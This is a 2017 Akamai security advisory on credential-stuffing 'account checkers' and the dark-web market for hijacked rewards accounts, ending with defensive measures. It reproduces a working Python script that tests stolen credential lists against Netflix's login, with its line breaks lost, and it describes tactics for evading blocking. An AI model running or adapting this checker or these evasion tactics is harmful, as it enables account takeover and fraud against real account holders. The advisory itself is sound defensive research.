Account Checkers and the Underground Economy for … · personal and financial data attached to the account can be used to build and sell ... and bulk credit card ... account systems

AKAMAI THREAT ADVISORY

Account Checkers and the Underground Economy for Rewards Fraud

Author: Benjamin Brown, Akamai SIRT

2

Threat Advisory: Account Checkers and the Underground Economy for Rewards Fraud

1.0 / Executive Summary / Account checkers are automated scripts or programs used to check a set of credentials against a website’s login system — through their main page, mobile, or API functions. These account checking campaigns can be overt and, behave like a Distributed Denial of Service (DDoS) attack, while in other instances, they can be more subtle. They will often come from a wide range of IPs through proxy use, botnet harnessing, or VPN leveraging. Once an account checking campaign is successful, the attackers can gain access to the targeted account — draining it of anything monetizable and then selling access or using the account for nefarious purposes. Defending against account checker attacks can be tricky, but does not need to be a Sisyphean task. In this paper, we’ll explore the potential targets for these attacks, the tools and techniques used, the underground economy that profits from account checking, and strategies for defending your business.

2.0 / Context For Attacks / The success of an account checker, also known as a credential stuffer, relies on the assumption that many people reuse the same login information across multiple websites. This means that a malicious actor only needs to get a victim’s set of credentials from a single site to be able to access their victim’s accounts across multiple other sites and programs. Attackers may then hack, purchase, or find website and database breaches that contain the same username and password sets. These lists of usernames and passwords are then loaded into automated checker scripts or programs that target the login systems for other websites where compromised users may also have active accounts. For example, a seemingly innocuous leak of user login data from a motorcycle repair forum may lead to the breach of multiple Paypal accounts, if participants use the same or similar login information on both websites.

2.1 / Target Industries / Akamai has witnessed account checker activity across most of the industries and verticals we service. Our observations reveal that these attacks are concentrated within the retail, online streaming, gaming, travel, hospitality, and financial sectors. Customer accounts in these industries often have monetizable items, data, credit, points, and/or balances. In the underground markets, these accounts are sold as single or multi-pack sets of login details. The accounts themselves can be used as part of larger identity theft, scamming, or money laundering campaigns. The rewards specific goods in these accounts can be monetized through resale or transfer. Simultaneously, the personal and financial data attached to the account can be used to build and sell personal identity packets.

2.2 / Traffic Analysis / The account checker attacks Akamai observes tend to be widely distributed and originate from many different geographical locations. Most of the IP addresses involved are compromised routers, home network storage devices, home media boxes, shared and private hosting servers, vulnerable WordPress sites, public proxies, and VPN pools. The traffic itself tends to follow a “low-and-slow” strategy — attempting to blend in with legitimate traffic. Attackers strive to keep request rates beneath the threshold for rate limiters and client reputation scoring.

3


While these campaigns can, and do, focus on a target’s main website login paths, Akamai also sees a lot of account checker traffic aimed at mobile sites and API login paths. Business logic tends to be simplified, and the layers of defense are less robust along these particular paths. Legacy login paths — some of which the customers didn’t even know still existed — were also targeted. These legacy paths were most likely found through site spidering and DNS brute-forcing.

The observed account checkers aren’t necessarily stopped by the go-to tools of malicious traffic blocking. They often utilized User-Agent (UA) randomization, which trivializes UA fingerprinting. Geo-blocking and IP blacklisting were circumvented through an increase in proxy and IP switching, as well as by leveraging VPN services that market responsive ‘anti-geoblocking’ features, like Hola VPN. Akamai’s observations also found that many attackers react to geoblocks by quickly switching away from the parts of their proxies or compromised hosts that are blacklisted, and instead focusing on those they believed are not yet flagged as ‘malicious’.

One of the oddities Akamai noticed in the account checker traffic was header orders. Since header orders tend to be non-standard, they can be used as one in a series of fingerprinting loci, becoming host to a plethora of invalid or blank referrers (note: there are instances where blank referrers are not a sign of malicious traffic, so you cannot rely on that piece of data alone when profiling client traffic). We also found that while they often used UA randomization, and invalid UA strings (i.e., UA strings that did not belong to any known, legitimate browser).

Figure 1: The attack request rate, as observed by Akamai’s Web Application Firewall

Figure 2: ‘Low -and- slow’ activity from single IP address — average of 5 requests/minute

4


3.0 / Tools / The tools used by malicious account checker gangs can range in complexity from a short, simple, python script to a feature-rich ongoingly developed software suite with customer support options:

import mechanizeimport time

print ‘[+]---Netflix Account Checker v0.1---[+]’print ‘--------------By Ramonem----------------’time.sleep(2)contex=0contno=0

accPass=[]outfile = open(‘good.txt’, ‘w’)

br = mechanize.Browser()br.set_handle_equiv(True)br.set_handle_redirect(True)br.set_handle_referer(True)br.set_handle_robots(False)br.addheaders = [(‘User-agent’, ‘Firefox’)]try: with open(“dump.txt”, “r”) as filestream: for line in filestream: br.open(‘https://www.netflix.com/Login?locale=es-CL’) currentline = line.split(‘:’) br.select_form(nr=0) br.form[‘email’] = currentline[0] br.form[‘password’] = currentline[1] print ‘Logueando.. mail: ‘+br.form[‘email’] response = br.submit() if response.geturl()==’http://www.netflix.com/browse’: print ‘Cuenta activa’ contex = contex + 1 br.open(‘http://www.netflix.com/SignOut?lnkctr=mL’) accPass.append(currentline[0]+’:’+currentline[1]) time.sleep(2) else: print ‘Muerta..’ contno = contno + 1 time.sleep(2) print ‘Escribiendo cuentas activas al txt..’ for all in accPass: print all outfile.write(str(all)+’\n’)except: print ‘Algo malo ocurrio.. Guardando progreso..’ for all in accPass: outfile.write(str(all)+’\n’)print ‘cuentas activas: ‘ + str(contex)print ‘cuentas muertas: ‘ + str(contno)

Figure 3: Simple python script for checking Netflix login credentials

5


4.0 / Web Based Checkers / One step up from simple scripts are the Web based checkers with Graphical User Interfaces (GUIs) . These sites often offer proxy support and quick account checks to grab credit or gift card information, current order statuses, addresses, phone numbers, and email accounts. This information can be used to intercept or reroute purchased goods. The more reliable and sophisticated web checkers often require purchased access tokens to operate, this nets the site admin both direct funding and access to all of the account credentials fed into their site. See examples below of two currently active web-based checkers.

Figure 4: A PHP web-based Walmart account checker with multiple features including proxy support

Figure 5: A PHP web based PayPal account checker with multiple features and a monetization function for the tool’s host

6


5.0 / Downloadable Checkers / Fraudsters can also download account checking software, which they can run from their local machine. Often found for sale, or cracked via fraud and hacking forums, many of these downloadable checkers do not have built in proxy support. These checkers are relatively simple, and tend to focus on a single service, as displayed in the images below.

Figure 6: A simple .NET Windows based Netflix account checker program

7


One major exception to the typical format of downloadable checkers is Sentry MBA. This account checker program has been in development for a few years, and each new version sports a treasure trove of features for any would-be account hijacker. The latest version of Sentry MBA offers proxy support with a built-in debugger, password brute forcing, custom plugins for popular website login pages, an HTTP debugger, a POST request creation wizard, browser fingerprint spoofing, referrer spoofing, user-agent customization and randomizer, and an OCR equipped captcha solver. See the following examples for greater detail.

Figure 7: A simple Windows based League of Legends account checker program

8


Figure 8: Sentry MBA 1.5’s ‘Home’ screen

Figure 9: Sentry MBA 1.5’s request header, user-agent, and POST customizers

9


5.0 / Underground Economy / To understand monetization strategies and get a sense of both the market size and the economic volume for rewards fraud, it is beneficial to turn to the Tor Markets, the successors to Silk Road Online. First, Akamai spot checked for fraud related listings, such as the following.

Figure 10: Sentry MBA 1.5’s credential ingest screen and optional brute forcing via wordlist tool

Figure 11: Hijacked streaming and retail accounts for sale

10


Figure 12: Stolen vouchers for sale

Figure 13: Hijacked Virgin Trains account with advertised balance

11


Figure 14: Offering for fraudulent transfers of GameStop reward points

Figure 15: Offering for fraudulent transfers of air miles

Figure 16: Stolen eGift Card codes for sale

12


5.1 / Market Selection Criteria / Once existence of rewards fraud related goods for sale was confirmed, we refined the Tor market selection criteria to make ensure that we were gathering data from live and active markets. Next, it was important to be sure the selected markets had an uptime greater than 95%. For our research, Akamai experts also wanted to make sure that they were relatively popular, so we confirmed that the chosen markets garnered Google search impressions of more than 60,000, and Google keywords greater than 100. These prerequisites narrowed research down to three markets: AlphaBay, Nucleus Market, and Dream Market.

5.2 / Market Size / To get a sense of market size, Akamai experts combed through all of the digital and fraud related listings on these three markets. Our research found a total of 14,183 unique digital goods for sale — things like hijacked accounts, eGift cards, malware, and more — along with a total of 15,426 unique fraud related offerings. These unique fraud related offerings were for commodities like bank drops, personally identifiable information or ‘fullz’, and bulk credit card numbers.

5.3 / Breakdown of the Numbers / The data gathered spanned a 10-month period of transactions in 2015. Feedback systems for these markets were locked down to those who had actually purchased the listing, so those markets were used to gauge sales volume.

Research found that across the three markets, there were 20 unique listings for logins to 20 different rewards account systems across 7 different vendors, resulting in 2,014 individual sales. There were 54 unique listings for rewards programs related vouchers and e-gift cards, across 13 different vendors resulting in 3,136 individual sales. For transferable rewards points, such as the GameStop PowerUp points shown earlier, there were three separate listings, for three different points systems, by three different vendors, resulting in 698 individual sales.

Surprisingly, only four listings were found, for four different air miles programs, across four vendors, with total individual sales of only 100. After some further investigation, it was found that, within the past few years, many major airlines have overhauled and tightened their miles transfer and authentication policies, combating much of the miles related fraud.

13


The next category was the most surprising. Research found a slew of offerings from self-proclaimed “Criminal Travel Agents.” These agents would book your next flight, hotel, car rental, train ride, or cruise using hijacked travel rewards accounts. They claimed that since they were using purloined rewards points, and not stolen credit cards, the services would not be canceled or investigated, since no “real” money was lost. Throughout the research process, 93 general listings for these services were found along with 94 custom order listings, across 31 different vendors, resulting in 4,808 separate sales. The market for these services is impressive, and the reviews from buyers were overwhelmingly positive — full of praise for the services rendered.

Rewards Account Logins

Vouchers & eGift Cards

Transferable Rewards Points

Air Miles

Criminal Travel Agency Services

Listings 20 54 3 4 93 General94 Custom

Vendors 7 13 3 4 31Sales 2014 3136 698 100 4808

Looking at a 10-month period in 2015 across only 3 Tor Markets, there were 10,756 individual transactions involving rewards account fraud. This certainly constitutes an active market for rewards related account fraud. Aside from the accounts and attached rewards goods, the contents of these accounts were desireable to hijackers in other ways, be it creditcard (CC) fraud, accrual of Personally Identifiable Information (PII), or access to other rewards programs through collaborative rewards portals for cross-program fraud.

5.4 / CC Fraud / Many consumers do not think twice when allowing a website to save their credit card information for easy future use or one-click purchasing. In the event that the account gets cracked, the hijacker can then use the attached card to purchase tangible goods, such as gift cards, points, miles, and anything else available through the account — after changing the shipping address of course.

5.5 / PII Concerns / Rewards programs are vehicles for businesses to collect data on customers. This data can then be used for more effective marketing, advertising, and offerings. Rewards accounts often have a large amount of personal information attached to them: such as email addresses, current and past home or work addresses, phone numbers, travel and purchase histories, preferences, reviews, and much more. This information can be readily used by account crackers to perpetrate identity theft, highly targeted scams, and phishing attempts.

14


5.6 / Cross-Program Fraud / Another rising complication in the fight against rewards fraud is the trend towards networking different rewards programs, enabling cross-program fraud. In this configuration, an account hijacker would only need to crack a login for one of the rewards programs to gain access to the rest in the network, making the account more valuable and tracing the fraud more difficult.

6.0 / Defenses / Changing the thresholds for rate controls was not useful in this case, however, there were a few other defense approaches that made a huge difference. Creating customized Web Application Firewall (WAF) rules, with special attention to quirky header orders and user-agents, as well as checking for valid referrers proved a large boon to netting and stopping malicious account checker requests.

It was also found that long-routing or tarpitting malicious traffic was more effective than simply serving them a 403. When malicious actors were blocked outright they would simply switch IPs and user-agents. However, when each of their requests was made to take a long time it greatly slowed down the entire campaign. Another clever defense maneuver that was employed was rerouting account checker traffic coming from known, bad IPs to a static, fake, “You’ve been successfully logged in” page. Since this fake page indicated a successful login their program marked that set of login credentials as “valid”— whether it was or not — and moved to the next set of credentials in their list. This also helped to poison the attackers’ credential validity tabulation.

Major defensive gains were also realized when efforts were placed into nuking legacy or publicly-facing development login paths — some of which customers didn’t even know still existed — while also tightening the controls and business logic on the mobile and API login paths.

However, the most successful defense tactic was having besieged customers alter the login process to require more information, such as the account owner’s last name. This method served to break the attacker’s programmed logic for expected login requirements, and was often a piece of data the attackers did not have on hand, especially considering the volume of accounts they were attempting to check. A step further on this defensive path would be for the customer to implement strong two-factor authentication controls.

Akamai gets to deploy a new set of defensive tools due to our recent acquisition of Cyberfend. Cyberfend’s technology works by integrating with a customer website’s login or form submissions. Various aspects of the form submission process are measured and evaluated to determine if activity looks to be bot-driven or automated. Any suspicious activity is flagged for the customer and can be blocked accordingly. This new system also protects against login replay and modified replay attacks.

15


7.0 / Future of Account Checker Targeting / Akamai predicts that we will continue to see both more leaks of login credentials, and more crackers using them in account checking campaigns. We also expect to see continued expansion of targeted verticals and industries. One particular target of interest will likely be the emerging healthcare and insurance patient portals. As an increasing number of medical records become digitized, more doctors share medical information with patients online, and more healthcare providers support online bill payment, the data and actions accessible through these portals become extremely valuable. This, in turn, escalates their appeal as a target for account checkers.

©2017 Akamai Technologies, Inc. All Rights Reserved. Reproduction in whole or in part in any form or medium without express written permission is prohibited. Akamai and the Akamai wave logo are registered trademarks. Other trademarks contained herein are the property of their respective owners. Akamai believes that the information in this publication is accurate as of its publication date; such information is subject to change without notice. Published 03/17.

Akamai is headquartered in Cambridge, Massachusetts in the United States with operations in more than 57 offices around the world. Our services and renowned customer care are designed to enable businesses to provide an unparalleled Internet experience for their customers worldwide. Addresses, phone numbers and contact information for all locations are listed on www.akamai.com/locations.

About Akamai® As the global leader in Content Delivery Network (cdn) services, Akamai makes the Internet fast, reliable and secure for its customers. The company’s advanced web performance, mobile performance, cloud security and media delivery solutions are revolutionizing how businesses optimize consumer, enterprise and entertainment experiences for any device, anywhere. To learn how Akamai solutions and its team of Internet experts are helping businesses move faster forward, please visit www.akamai.com or blogs.akamai.com, and follow @Akamai on Twitter.

http://www.akamai.com/locations

http://www.akamai.com

blogs.akamai.com

https://www.twitter.com/akamai

Documents

Account Checkers and the Underground Economy for … · personal and financial data attached to the account can be used to build and sell ... and bulk credit card ... account systems